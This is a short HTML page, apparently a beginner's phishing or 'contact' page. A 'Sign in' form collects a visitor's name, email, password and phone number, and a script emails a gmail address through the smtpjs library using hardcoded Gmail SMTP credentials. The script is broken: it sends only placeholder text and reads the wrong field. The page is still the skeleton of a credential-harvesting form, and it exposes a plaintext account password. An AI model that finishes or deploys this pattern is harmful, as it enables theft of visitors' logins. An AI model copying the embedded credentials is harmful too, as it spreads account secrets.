<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>email</title>
    <link rel="stylesheet" href="style.css">
    <link rel="stylesheet" href="">
</head>
<body>
    <div class="containre">
        <form onsubmit="SendEmail(); reset(); return false;" >
            <h2>Get your email</h2>
            <input type="text" id="name" placeholder="your name" required>
            <input type="email" id="email" placeholder="Email" required>
            <input type="password" id="password" placeholder="Password" required>
            <input type="number" id="number" placeholder="Phone number" required>
            <button type="submit">Sign in</button>
        </form>

    </div>
    <script src=" https://smtpjs.com/v3/smtp.js"></script>
    <script>
        function SendEmail(){

            Email.send({
    Host : "smtp.gmail.com",
    Username : "abdssamad@gmail.com",
    Password : "ayoubabdo123",
    To : 'gounni.dred@gmail.com',
    From : document.getElementById("email").ariaValueMax,
    Subject : "New contact from enquiry",
    Body : "And this is the body"
            }).then(
            message => alert(message)
            );
        }
    </script>
</body>
</html>